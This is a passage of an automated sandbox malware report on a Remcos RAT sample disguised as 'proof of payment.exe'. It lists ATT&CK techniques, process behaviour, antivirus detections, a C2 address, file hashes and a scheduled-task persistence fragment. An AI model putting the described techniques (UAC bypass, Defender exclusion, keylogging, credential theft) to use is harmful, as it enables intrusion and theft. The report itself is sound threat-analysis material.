Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 11 Native API; 12 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Windows Service; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 222 Process Injection; 1 Scheduled Task/Job; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection
Credential Access: 2 OS Credential Dumping; 211 Input Capture; 2 Credentials in Registry; 3 Credentials In Files; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 38 System Information Discovery; 131 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 12 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 211 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1435940 | Sample: proof of payment.exe | Start date: 03/05/2024 | Architecture: WINDOWS | Score: 100

Behavior graph (process tree with dropped files, network contacts and signatures per node; numbers in parentheses are the node annotations from the original graph):

proof of payment.exe (start)
  DNS/IP: geoplugin.net
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 19 other signatures
  -> proof of payment.exe (7) started
       Dropped: C:\Users\user\AppData\Roaming\NvbYSEq.exe, PE32; C:\Users\user\AppData\Local\...\tmpCCF4.tmp, XML
       Signatures: Adds a directory exclusion to Windows Defender
       -> proof of payment.exe (3 15) started
            DNS/IP: 37.120.235.122, 2269, 49708, 49712, SECURE-DATA-ASRO Romania; geoplugin.net 178.237.33.50, 49715, 80, ATOM86-ASATOM86NL Netherlands
            Dropped: C:\ProgramData\remcos\logs.dat, data
            Signatures: Detected Remcos RAT; Tries to harvest and steal browser information (history, passwords, etc); Maps a DLL or memory area into another process; Installs a global keyboard hook
            -> proof of payment.exe started
                 Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
            -> proof of payment.exe started
                 Signatures: Tries to harvest and steal browser information (history, passwords, etc)
            -> proof of payment.exe (14) started
            -> 3 other processes
       -> powershell.exe (20) started
            Signatures: Loading BitLocker PowerShell Module
            -> WmiPrvSE.exe started
            -> conhost.exe started
       -> schtasks.exe (1) started
            -> conhost.exe started
  -> NvbYSEq.exe (5) started
       Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionality to bypass UAC (CMSTPLUA); 7 other signatures
       -> NvbYSEq.exe started
       -> schtasks.exe (1) started
            -> conhost.exe started

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label | Link
proof of payment.exe | 56% | Virustotal | | Browse
proof of payment.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
proof of payment.exe | 100% | Avira | HEUR/AGEN.1306895 |
proof of payment.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\NvbYSEq.exe | 100% | Avira | HEUR/AGEN.1306895 |
C:\Users\user\AppData\Roaming\NvbYSEq.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\NvbYSEq.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
C:\Users\user\AppData\Roaming\NvbYSEq.exe | 56% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
geoplugin.net | 4% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing |
http://www.imvu.comr | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing |
http://www.ebuddy.com | 0% | URL Reputation | safe |
37.120.235.122 | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gp2 | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpOw | 0% | Avira URL Cloud | safe |
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gp_ | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gp2 | 0% | Virustotal | | Browse
http://geoplugin.net/json.gp_ | 0% | Virustotal | | Browse
37.120.235.122 | 0% | Virustotal | | Browse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    178.237.33.50
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gptrue
                    • URL Reputation: phishing
                    unknown
                    37.120.235.122true
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.imvu.comr | proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp/C | proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp | true | URL Reputation: phishing | unknown
http://www.imvu.com | proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp2 | proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | proof of payment.exe | false | | high
https://login.yahoo.com/config/login | proof of payment.exe | false | | high
http://geoplugin.net/json.gpOw | proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | proof of payment.exe, 0000000F.00000002.1695925897.00000000009C4000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net/ | proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | proof of payment.exe, 00000000.00000002.1499485685.0000000002661000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1538465921.0000000002648000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp_ | proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.ebuddy.com | proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
37.120.235.122 | unknown | Romania | 3210 | SECURE-DATA-ASRO | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435940
Start date and time: 2024-05-03 13:12:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: proof of payment.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@28/15@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 151
• Number of non-executed functions: 367
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
12:13:18 | Task Scheduler | Run new task: NvbYSEq path: C:\Users\user\AppData\Roaming\NvbYSEq.exe
13:13:16 | API Interceptor | 5159750x Sleep call for process: proof of payment.exe modified
13:13:18 | API Interceptor | 13x Sleep call for process: powershell.exe modified
13:13:19 | API Interceptor | 1x Sleep call for process: NvbYSEq.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37.120.235.122 | proof of paymentt.exe | malicious | Remcos, PureLog Stealer |
178.237.33.50 | fatura.bat.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | proof of paymentt.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | 586 R1 M-LINE - GEORGIA 03.05.2024.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | xi0TpAxHGMsm.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#46789.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | GVV.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | fatura.bat.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | proof of paymentt.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | 586 R1 M-LINE - GEORGIA 03.05.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | xi0TpAxHGMsm.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | INQUIRY#46789.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | GVV.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATOM86-ASATOM86NL | fatura.bat.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | proof of paymentt.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | 586 R1 M-LINE - GEORGIA 03.05.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | xi0TpAxHGMsm.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | INQUIRY#46789.xla.xlsx | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | GVV.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
SECURE-DATA-ASRO | proof of paymentt.exe | malicious | Remcos, PureLog Stealer | 37.120.235.122
SECURE-DATA-ASRO | Ei6JHlax9A.exe | malicious | Remcos | 37.120.235.114
SECURE-DATA-ASRO | c5YXaP80M6975Ej.exe | malicious | Remcos | 37.120.235.114
SECURE-DATA-ASRO | SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll | malicious | CobaltStrike | 37.120.232.43
SECURE-DATA-ASRO | ATT00001.png | malicious | HTMLPhisher | 37.120.234.46
SECURE-DATA-ASRO | 8uT94eNAur.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog Stealer | 37.120.237.196
SECURE-DATA-ASRO | rKYmlnOolQ.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine | 37.120.237.196
SECURE-DATA-ASRO | ry4836TEeV.exe | malicious | Dridex Dropper, RisePro Stealer | 37.120.237.196
SECURE-DATA-ASRO | ry4836TEeV.exe | malicious | Dridex Dropper, RisePro Stealer | 37.120.237.196
SECURE-DATA-ASRO | RUWXufvW4x.exe | malicious | LummaC, Python Stealer, Amadey, Glupteba, LummaC Stealer, Mars Stealer, Monster Stealer | 37.120.237.196
                                    No context
                                    No context
Process: C:\Users\user\Desktop\proof of payment.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.3829237234308707
Encrypted: false
SSDEEP: 3:rhlKlFflWlN/Mi5JWRal2Jl+7R0DAlBG45klovDl6v:6llMn5YcIeeDAlOWAv
MD5: 80BAF8D4D3538963627F7AFA47526DE5
SHA1: 5A6EABD23D7B29925E8CE4D791FE571E08FE8AD7
SHA-256: 57635BC92E9C153A832E1FD25562323B7DEEF2B6B0E6589AC63E932B2D2E4C5A
SHA-512: CE6627FD8598C6F9F7779EBFC079B87BF4009A9B1AE080AC8B8AF2B1FEA94D7CA5AE92BB207C0A56FD83CC14089D26721DE476931418C05E63283235F58814F2
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview (UTF-16 text):
[2024/05/03 13:13:18 Offline Keylogger Started]

[Program Manager]
Process: C:\Users\user\AppData\Roaming\NvbYSEq.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
Preview:
1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\Desktop\proof of payment.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview:
1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\Desktop\proof of payment.exe
File Type: JSON data
Category: dropped
Size (bytes): 965
Entropy (8bit): 5.023161606859709
Encrypted: false
SSDEEP: 12:tkeknd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7Pp:qPdVauKyGX85jvXhNlT3/7AcV9Wro
MD5: 213C021986665186ADF388537CF7904A
SHA1: AC939D70CA45E2BC2643EC9C2B491E39AFFD7B1A
SHA-256: 59379A6DB89949B709D13D99B13CE3F5B9B9F3064198304C6DB83D3503A46825
SHA-512: 07DE974A4EA0E3F0684165D0184C14801B02DA4541A244262107E33B4B2FFE7FE34924171CEB8126357E1DE15064EE43D7737C58E6A5B4188CECF3A0AEA1E68B
Malicious: false
Preview:
{
  "geoplugin_request":"191.96.227.219",
  "geoplugin_status":200,
  "geoplugin_delay":"2ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380805901110357
Encrypted: false
SSDEEP: 48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:lGLHyIFKL3IZ2KRH9OugEs
MD5: 4AD173050672D4E4D906A6827BD76175
SHA1: 971C60C54970A8C94A85753FB9301C49CAF63FE0
SHA-256: FB92B93A8CCCB82D3449F3CA68452EEF78C571C95D7DB84CC9B12C8D6C0498C1
SHA-512: 49C6D82B927706A7152FDA8ABE53836619B2A2EECFA4D473B6F63F9506579255F552E3F5CB67654D7EF32B45BEE83AA5CE110E3C01BEEBFA852DDBD7C2C60BFC
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Users\user\Desktop\proof of payment.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x0155ffb7, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 15728640
Entropy (8bit): 0.10807997132117475
Encrypted: false
SSDEEP: 1536:GSB2jpSB2jFSjlK/gw/ZweshzbOlqVqww/ZXesozbElqVqgesKzbdzb+zb6:Ga6amUueqaJEeqv7tW
MD5: 40D660B4AE3EF5A4D0EDCE7216A746FD
SHA1: 4725EF64323F955EFE529DA3EE8F7DC0EA1E8626
SHA-256: D264158F0DB89FF6E751CF3697F21AD1B462A3866A737B0836194672AE24B67A
SHA-512: 91044A1F5380FB982FAE2ACA51AF917C239E6A1D04798E3262037B5670EA37DBB7A7C5AA4197C8A7C7514790EE465B3183504A152F501F37729617DE898F8E22
Malicious: false
Process: C:\Users\user\Desktop\proof of payment.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1566
Entropy (8bit): 5.08843411652121
Encrypted: false
SSDEEP: 48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewLv:HeLwYrFdOFzOz6dKrsuq2
MD5: DA2728ED3578E03A7B01831B0FEEE30D
SHA1: D037D81CD9CB7EEA089B1ABAEA9FA45EBECF0ACD
SHA-256: 10B5B0FB86E77C0EF27565A750B6D7931599F18C2D5E7700EE81D75E92ED47F0
SHA-512: 479D08B7F062092B194FD9F50367DFB530136736DA9111DBCA663F23E5D1AEF1F64700CEE450C0E270186D9EA6D31309D1B6074C344D3F1BC70C815174F02958
Malicious: true
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>f
                                    Process:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1566
                                    Entropy (8bit):5.08843411652121
                                    Encrypted:false
                                    SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewLv:HeLwYrFdOFzOz6dKrsuq2
                                    MD5:DA2728ED3578E03A7B01831B0FEEE30D
                                    SHA1:D037D81CD9CB7EEA089B1ABAEA9FA45EBECF0ACD
